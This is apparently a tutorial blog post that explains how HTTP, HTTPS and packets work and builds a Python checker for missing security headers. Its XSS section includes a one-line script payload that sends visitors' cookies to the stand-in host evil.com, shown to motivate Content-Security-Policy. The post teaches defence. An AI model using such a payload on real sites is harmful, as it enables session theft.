Building a Domain Security Analyzer — HTTP Security Headers
In the last post, we added SSL certificate validation. But before we check security headers, let's understand what actually happens when you visit a website. We'll start from the very beginning.
Today's Goal
By the end of this post, you'll understand:
What HTTP is — How browsers and servers communicate
What HTTPS is — How that communication becomes private
What security headers are — Extra instructions for safer browsing
How to check them — Code that analyzes any domain's headers
Part 1: What Really Happens When You Type github.com
When you type github.com and press Enter, the first thing your browser does is figure out where GitHub actually is. Your browser asks a DNS server "What's the IP address for github.com?" and gets back something like 20.207.73.82. We covered this in our first blog post.
Now your browser knows the address. But it can't just start sending data. First, it needs to establish a connection.
The TCP Handshake
Your computer sends a small packet to GitHub's server saying "I want to talk to you." GitHub's server responds "Okay, I'm listening." Your computer confirms "Great, let's begin." This is called the TCP handshake — three messages back and forth just to establish that both sides are ready to communicate. Think of it like calling someone on the phone — it rings, they pick up, you say hello, they say hello back. Only then do you start the actual conversation.
Once this connection is established, now your browser can send the actual HTTP request.
Part 2: What is a Packet?
When your computer sends data over the internet, it doesn't send it as one big chunk. It breaks the data into small pieces called packets. Each packet is just a small bundle of bytes — typically around 1500 bytes maximum.
Why packets? Imagine you want to send a large book to someone across the country. You could ship the whole book in one box. But if that box gets lost, you lose everything. Instead, imagine tearing out each page and mailing them separately. If one page gets lost, you only resend that page. Also, different pages can take different routes and still arrive at the destination.
The internet works this way. Your data gets split into packets. Each packet travels independently through the network. They might take different paths. They arrive at the destination, and the receiving computer reassembles them in the correct order.
Each packet contains two things: the actual data you're sending, and some header information that says where it came from and where it's going — like the address on an envelope.
Part 3: How Does a Packet Know Where to Go?
At the physical level, it's just electrical signals on a wire. The wire doesn't know anything. The wire is just copper or fiber. It carries signals. It has no idea what those signals mean.
The meaning comes from how we interpret the signals.
At the lowest level, a wire can carry two states — voltage on or voltage off. Think of it like a light switch. On or off. We call these 1 and 0.
So if I send: on, off, off, on, on, off, on, off
That's: 1 0 0 1 1 0 1 0
That's just 8 bits. One byte. The number 154 in decimal.
But what does 154 mean? By itself, nothing. It's just a number.
Layers of Meaning
We build layers of interpretation on top of these raw bits.
Suppose we agree that the first few bytes of any transmission will be the destination address, followed by the source address, followed by some information about what kind of data this is, followed by the actual data.
Now when I send a stream of bits, you can look at the first part and say "this is going to address X." You look at the next part and say "this came from address Y." You look at the next part and say "this is a certain type of data." Then you read the actual content.
This is exactly what happens. The bits traveling on the wire are organized into a structure. The structure has a known format. The first so many bytes mean this, the next so many bytes mean that.
The Structure of a Packet
When your computer sends a packet to GitHub, the packet is just a sequence of bytes — ones and zeros on the wire. But those bytes are organized in a specific order that everyone agrees on.
The packet has layers, like an envelope inside an envelope.
The outermost layer is the Ethernet frame. This contains the MAC address of your router and the MAC address of your computer. MAC addresses are physical addresses burned into network hardware. This layer is only used to get the packet from your computer to your router.
Inside that is the IP layer. This contains the source IP address and destination IP address. Your IP might be something your router assigns internally, like 192.168.1.5. The destination IP is GitHub's: 20.207.73.82.
Inside that is the TCP layer. This contains the source port and destination port. Maybe your source port is 52431 and the destination port is 443.
Inside that is the actual HTTP data. The text that says GET /repositories HTTP/1.1 and so on.
So the full packet on the wire looks something like:
[Ethernet header] [IP header] [TCP header] [HTTP data]
Each header has a fixed format. The IP header always has the source IP at a certain position and the destination IP at another position. Every device on the internet knows this format.
How Routers Use This
When your packet arrives at your router, the router reads the Ethernet header first. It sees the packet is addressed to the router itself. Good. The router strips off the Ethernet header and looks at the IP header underneath.
The IP header says the destination is 20.207.73.82. The router doesn't know where that is exactly, but it knows which direction to send it — probably to your ISP. So the router wraps the packet in a new Ethernet header addressed to your ISP's equipment and sends it out.
Your ISP's router receives it, strips the Ethernet header, reads the IP header, sees 20.207.73.82, figures out which direction to send it next, wraps it in a new Ethernet header, and forwards it.
This happens at every hop along the way. Each router looks at the IP header to decide where to send the packet next. The IP addresses never change, but the Ethernet headers change at every hop.
Eventually the packet reaches GitHub's network. Their router sees the destination IP is their own server. It delivers the packet to that server.
The server strips off the Ethernet header, the IP header, the TCP header, and finally reads the HTTP data: GET /repositories HTTP/1.1.
Part 4: But How Does Your Computer Know GitHub's IP?
You're typing github.com, not an IP address. Your computer has no idea what GitHub's IP address is. You only typed a name. Names are for humans. Computers need numbers.
So before anything else can happen, your computer must convert the name github.com into an IP address. This is what DNS does.
The DNS Query
Your computer constructs a DNS query. This is a small packet that basically says: "What is the IP address for github.com?"
Your computer sends this to a DNS resolver — maybe Google's at 8.8.8.8 or Cloudflare's at 1.1.1.1 or your ISP's DNS server.
The resolver receives your query. It looks up the answer — either from its own cache, or by querying other DNS servers. It finds that github.com maps to 20.207.73.82.
It sends a response packet back to your IP address. Your computer now knows: github.com is 20.207.73.82.
Only now can your browser make the actual HTTP request.
Who Manages DNS Servers?
At the very top are the root servers. There are 13 root server addresses, managed by various organizations — some by universities, some by government agencies, some by companies like Verisign.
The root servers don't know every domain. They only know who manages each top-level domain like .com, .org, .in.
Verisign manages .com. Every time someone registers a .com domain, Verisign gets paid a wholesale fee — currently around 9 US dollars per year per domain. There are over 150 million .com domains. That's how they fund their servers and make profit.
When GitHub registered their domain, they told the registrar where their DNS servers are. When someone asks for github.com, the chain goes: root servers point to Verisign's .com servers, which point to GitHub's DNS servers, which provide the actual IP address.
Part 5: How Does GitHub Know Which Request is Yours?
GitHub's server might be receiving thousands of requests every second from different people around the world. How does it keep track of which response goes to which person?
IP Addresses and Ports
Your home router has a public IP address assigned by your ISP. Let's say it's 49.36.128.55. This address is unique to your home at this moment.
But what if multiple devices in your house are all accessing GitHub at the same time? Your brother is on his laptop, you're on your phone, your sister is on her computer. All three are behind the same router with the same public IP. How does the router know which response goes to which device?
This is where ports come in.
When your browser opens a connection to GitHub, it picks a random port number — let's say 52431. Your brother's laptop picks a different port — maybe 48892. Your sister's computer picks another — maybe 51007.
So the full address is not just an IP, it's an IP plus a port:
Your connection: 49.36.128.55:52431 → 20.207.73.82:443
Your brother's connection: 49.36.128.55:48892 → 20.207.73.82:443
Your router keeps a table. It remembers that port 52431 belongs to your phone, port 48892 belongs to your brother's laptop, and so on.
When GitHub sends a response to 49.36.128.55:52431, your router looks at the port number, checks its table, and forwards the data to your phone.
How Are Packets Reassembled?
Your HTTP request might be split across multiple packets. How does GitHub put them back together in the right order?
TCP handles this. The TCP header contains a sequence number.
When your browser sends data, it assigns sequence numbers to every byte. If your HTTP request is 500 bytes:
Packet 1 contains bytes 1-200, TCP header says "sequence number 1"
Packet 2 contains bytes 201-400, TCP header says "sequence number 201"
Packet 3 contains bytes 401-500, TCP header says "sequence number 401"
Packets might arrive out of order. GitHub's server looks at the sequence numbers and reassembles them correctly.
If a packet gets lost, TCP detects it and asks for retransmission. This guarantees all data arrives completely and in order.
Part 6: What is HTTP?
Now your request has reached GitHub. The connection is established. Your browser needs to ask for a webpage. How does it ask?
HTTP — HyperText Transfer Protocol — is the language browsers and servers use to communicate. It's a set of rules for how to request things and how to respond.
What Does an HTTP Request Look Like?
When your browser asks GitHub for a page, it sends plain text:
GET /repositories HTTP/1.1
Host: github.com
User-Agent: Chrome/120.0
Accept: text/html
That's it. Just text.
The first line says what you want. GET means you want to retrieve something. /repositories is the path — which specific page you want. HTTP/1.1 is the version of HTTP.
The next lines are headers — extra information about your request. Host says which website you want. User-Agent says what browser you're using. Accept says what type of content you can handle.
This text gets converted to bytes, broken into packets, and sent across the internet to GitHub.
What Does an HTTP Response Look Like?
GitHub's server receives your request, finds the page, and sends back a response. Also plain text:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 45231
<!DOCTYPE html>
<html>
<head><title>GitHub</title></head>
<body>
...the actual webpage...
</body>
</html>
The first line is the status. 200 means success. 404 would mean not found. 500 would mean server error.
Then come response headers. Content-Type tells your browser this is HTML. Content-Length says how many bytes the body is.
Then a blank line.
Then the actual content — the HTML of the webpage.
The Problem With HTTP
HTTP sends everything in plain text. Your request travels through your router, your ISP, multiple other networks, before reaching GitHub. At any point along this path, someone could read the text.
If you're logging into GitHub:
POST /login HTTP/1.1
Host: github.com
username=umang&password=secret123
Your username and password are right there in plain text. Anyone who can see the packets can read your password.
Part 7: What is HTTPS?
HTTPS is HTTP with encryption. The S stands for Secure.
With HTTPS, before any HTTP request is sent, your browser and GitHub's server set up encryption. They do a handshake where they agree on a secret key that only they know.
Once encryption is set up, your browser takes the same HTTP request but encrypts it before sending. What actually travels on the wire looks like:
xK7$mP2#vL9@nQ4%bR8&hY3*kW6!tF5^jM1...
Complete garbage to anyone watching.
GitHub's server receives this, decrypts it using the secret key, and sees your original request with your username and password.
The Handshake — How Encryption Gets Set Up
Your browser sends a "hello" packet to GitHub saying "I want a secure connection. Here are the encryption methods I support."
GitHub responds with "Let's use this encryption method. Here's my certificate." The certificate contains GitHub's public key and proof that GitHub is really GitHub.
Your browser verifies the certificate. It checks: Is this signed by a trusted authority? Is it for github.com? Has it expired?
Now comes the clever part. Your browser generates a random secret. It encrypts this secret using GitHub's public key and sends it.
Anyone watching can see this packet. But it's encrypted with GitHub's public key. Only GitHub's private key can decrypt it. The private key never travels on the wire — it stays on GitHub's server.
GitHub decrypts the secret using their private key. Now both sides know the same secret, but no one else does.
They use this secret to generate encryption keys. From now on, all data is encrypted.
Why Can't Someone Just Decrypt With the Public Key?
This is a common question. If the browser encrypts with the public key, why can't an eavesdropper decrypt with the same public key?
Because public key cryptography doesn't work that way. The public key can only encrypt. It cannot decrypt — not even data it encrypted itself. Only the private key can decrypt.
This is based on math that's easy in one direction but nearly impossible in reverse. The public key contains a huge number N that's the product of two prime numbers P and Q. Encryption uses N. But decryption requires knowing P and Q separately. And figuring out P and Q from N alone would take longer than the age of the universe for large enough numbers.
Symmetric Encryption
There's one more detail. Public key encryption is slow. So it's only used to share a small secret. Once both sides have the secret, they switch to symmetric encryption — where the same key encrypts and decrypts.
Symmetric encryption is fast. The actual HTTP data — your requests, the webpages — is encrypted using this fast method. The slow public key method was only used once to safely share the symmetric key.
Could Someone Guess the Symmetric Key?
Yes, if you guess the key, you can decrypt everything. But guessing is practically impossible.
A 128-bit key has 340,282,366,920,938,463,463,374,607,431,768,211,456 possible values. If you tried one trillion guesses per second, it would take longer than the age of the universe to try them all.
The entire security of HTTPS rests on the key being impossible to guess and never being transmitted in plain form.
Part 8: What Are HTTP Headers?
Your request reached GitHub encrypted. GitHub decrypted it, processed it, and sent back a response — also encrypted. Your browser decrypted the response.
Now your browser has the raw HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 45231
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
<!DOCTYPE html>
<html>...the webpage...</html>
The body is the actual webpage. But before the body, there are headers. These headers are instructions from GitHub's server to your browser.
Some headers are informational — Content-Type says this is HTML. But some headers are security instructions. They tell your browser how to behave safely when handling this website.
When Does the Browser Receive Headers?
Every time. Every HTTP response has headers. When you visit GitHub's homepage, you get headers. When you load an image, you get headers. Every single response.
Different headers are applied at different times. Some are remembered by your browser. Others are applied immediately to that specific response.
Part 9: Why Are Security Headers Needed?
HTTPS protects data while it travels. But once the data arrives at your browser, new threats exist. These threats happen inside your browser, after decryption. HTTPS cannot help with these.
Attack 1: Clickjacking
An iframe is a way to embed one webpage inside another. You've seen this — a news article with a YouTube video embedded in it.
Now imagine an attacker creates a website. On their page, they create an iframe that loads GitHub's account deletion page. But they make this iframe invisible — opacity zero, or positioned so you can't see it.
On top of this invisible iframe, they put a big button saying "Click here to win a free iPhone."
They position it so that GitHub's "Confirm Delete" button sits exactly where the "win prize" button appears to be.
You click what you think is "win prize." But your click actually lands on the invisible GitHub "Confirm Delete" button. If you're logged into GitHub, your account gets deleted. You never saw GitHub's page. Your click was hijacked.
How X-Frame-Options Prevents This
GitHub sends this header:
X-Frame-Options: DENY
This tells your browser: "Do not allow GitHub pages to be displayed inside iframes on other websites."
When the attacker's site tries to load GitHub in an iframe, your browser checks GitHub's headers, sees X-Frame-Options: DENY, and refuses to display it. The iframe stays empty. Attack prevented.
Attack 2: XSS (Cross-Site Scripting)
Many websites let users post content — comments, profiles, reviews.
Suppose an attacker writes this as their bio:
Hi, I'm a developer! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
If the website saves this and displays it without sanitizing, what happens?
When someone visits that profile, their browser sees a script tag. Browsers execute script tags. The script runs, reads the visitor's cookies, and sends them to the attacker. With your session cookie, the attacker can log into your account.
How Content-Security-Policy Helps
GitHub sends this header:
Content-Security-Policy: script-src 'self'
This tells the browser: "Only execute JavaScript from my own domain. Do not execute inline scripts."
When the browser sees the malicious script tag, it checks the policy. Inline scripts aren't allowed. The browser refuses to execute it. Attack prevented.
Attack 3: Protocol Downgrade
You type github.com without the https://. Your browser might try http:// first. An attacker on your network could intercept this unencrypted request and serve you a fake page.
How Strict-Transport-Security Helps
The first time you visit GitHub over HTTPS, GitHub sends:
Strict-Transport-Security: max-age=31536000
Your browser remembers: "For the next year, always use HTTPS for GitHub."
From now on, whenever you type github.com, your browser automatically uses HTTPS. It never tries HTTP. The attacker never gets a chance.
Part 10: The Security Headers We'll Check
Here are the headers we'll look for:
Strict-Transport-Security — Forces HTTPS connections. Prevents downgrade attacks.
Content-Security-Policy — Controls what scripts, styles, and content can load. Prevents XSS.
X-Frame-Options — Prevents the site from being embedded in iframes. Prevents clickjacking.
X-Content-Type-Options — Prevents browsers from guessing content types. Stops certain attacks where browsers might execute files as scripts.
Referrer-Policy — Controls what URL information is sent when you click links to other sites. Prevents leaking sensitive URL paths.
Permissions-Policy — Controls access to browser features like camera, microphone, location.
Part 11: The Code
Let's write code that checks for these headers.
First, install the requests library:
pip install requests
pip freeze > requirements.txt
Add this import at the top of analyzer.py:
import requests
Now add this function:
def get_security_headers(domain):
"""Fetch and analyze HTTP security headers for a domain."""
security_headers = {
'Strict-Transport-Security': {
'description': 'Forces HTTPS connections',
'recommended': True
},
'Content-Security-Policy': {
'description': 'Controls allowed content sources',
'recommended': True
},
'X-Frame-Options': {
'description': 'Prevents clickjacking attacks',
'recommended': True
},
'X-Content-Type-Options': {
'description': 'Prevents MIME type sniffing',
'recommended': True
},
'Referrer-Policy': {
'description': 'Controls referrer information leakage',
'recommended': True
},
'Permissions-Policy': {
'description': 'Controls browser feature access',
'recommended': True
}
}
try:
url = f"https://{domain}"
response = requests.get(url, timeout=10, allow_redirects=True)
results = {
'success': True,
'url': response.url,
'status_code': response.status_code,
'headers': {}
}
for header_name, header_info in security_headers.items():
header_value = response.headers.get(header_name)
results['headers'][header_name] = {
'present': header_value is not None,
'value': header_value,
'description': header_info['description']
}
return results
except requests.exceptions.SSLError as e:
return {
'success': False,
'error': f"SSL Error: {e}"
}
except requests.exceptions.ConnectionError:
return {
'success': False,
'error': f"Could not connect to {domain}"
}
except requests.exceptions.Timeout:
return {
'success': False,
'error': "Connection timed out"
}
except Exception as e:
return {
'success': False,
'error': str(e)
}
Part 12: Code Walkthrough
Let me explain each part.
def get_security_headers(domain):
This defines a function that takes a domain name like "github.com" and returns information about its security headers.
security_headers = {
'Strict-Transport-Security': {
'description': 'Forces HTTPS connections',
'recommended': True
},
...
}
This is our checklist — the headers we want to check. We define what we're looking for. The server's response might have some of these, all of these, or none.
url = f"https://{domain}"
response = requests.get(url, timeout=10, allow_redirects=True)
We build the URL and make the request.
requests.get() does everything we discussed — DNS lookup, TCP handshake, TLS handshake, sending the HTTP request, receiving the response. The library handles all of it.
timeout=10 means give up after 10 seconds if no response.
allow_redirects=True means follow redirects automatically.
The response object contains everything the server sent back — status code, headers, body.
results = {
'success': True,
'url': response.url,
'status_code': response.status_code,
'headers': {}
}
We create a dictionary to store our findings. The headers dictionary starts empty — we'll fill it as we check each header.
for header_name, header_info in security_headers.items():
header_value = response.headers.get(header_name)
This loops through our checklist. For each header we care about, we ask the response: "Do you have this header?"
response.headers.get(header_name) returns the header's value if it exists, or None if it doesn't.
results['headers'][header_name] = {
'present': header_value is not None,
'value': header_value,
'description': header_info['description']
}
We record what we found. If header_value is None, present becomes False. If it has a value, present becomes True.
This is how we detect missing headers. We check each header on our list against what the server actually sent. If it's not in the response, it's missing.
except requests.exceptions.SSLError as e:
return {
'success': False,
'error': f"SSL Error: {e}"
}
If something goes wrong — SSL error, connection refused, timeout — we catch it and return an error message instead of crashing.
Part 13: Update main() to Display Results
Add this to your main() function after the SSL section:
# Security Headers
print("\nSecurity Headers:")
headers_result = get_security_headers(domain)
if headers_result['success']:
print(f" URL: {headers_result['url']}")
print(f" Status: {headers_result['status_code']}")
print()
for header_name, header_data in headers_result['headers'].items():
if header_data['present']:
value = header_data['value']
if len(value) > 50:
value = value[:50] + "..."
print(f" ✓ {header_name}")
print(f" {value}")
else:
print(f" ✗ {header_name} - MISSING")
print(f" ({header_data['description']})")
else:
print(f" ✗ Error: {headers_result['error']}")
Part 14: Explanation of Display Code
headers_result = get_security_headers(domain)
Call our function and store the results.
if headers_result['success']:
Only show details if the request worked.
for header_name, header_data in headers_result['headers'].items():
Loop through each header we checked.
if header_data['present']:
value = header_data['value']
if len(value) > 50:
value = value[:50] + "..."
print(f" ✓ {header_name}")
print(f" {value}")
If the header exists, print a checkmark and its value. Long values get truncated for readability.
else:
print(f" ✗ {header_name} - MISSING")
print(f" ({header_data['description']})")
If the header is missing, print an X and explain what it does. This helps users understand what protection is missing.
Part 15: Test It
python analyzer.py github.com
You should see output like:
Security Headers:
URL: https://github.com/
Status: 200
✓ Strict-Transport-Security
max-age=31536000; includeSubdomains; preload
✓ Content-Security-Policy
default-src 'none'; base-uri 'self'; child-sr...
✓ X-Frame-Options
deny
✓ X-Content-Type-Options
nosniff
✓ Referrer-Policy
strict-origin-when-cross-origin
✓ Permissions-Policy
accelerometer=(), autoplay=(), camera=(), cro...
GitHub has all security headers.
Try a simpler site:
python analyzer.py example.com
Security Headers:
URL: https://example.com/
Status: 200
✗ Strict-Transport-Security - MISSING
(Forces HTTPS connections)
✗ Content-Security-Policy - MISSING
(Controls allowed content sources)
✗ X-Frame-Options - MISSING
(Prevents clickjacking attacks)
✗ X-Content-Type-Options - MISSING
(Prevents MIME type sniffing)
✗ Referrer-Policy - MISSING
(Controls referrer information leakage)
✗ Permissions-Policy - MISSING
(Controls browser feature access)
example.com has no security headers — common for simple placeholder sites.
Commit Your Progress
git add .
git commit -m "Add HTTP security headers analysis"
git push origin main
What's Next
We now have a complete domain analyzer that checks:
DNS records (A, MX, SPF, DMARC)
SSL certificate validation
HTTP security headers
In the next post, we'll create a security scoring system — combining all these checks into a single 0-100 score with specific recommendations.
See you in the next one.
Find the code for this post on GitHub.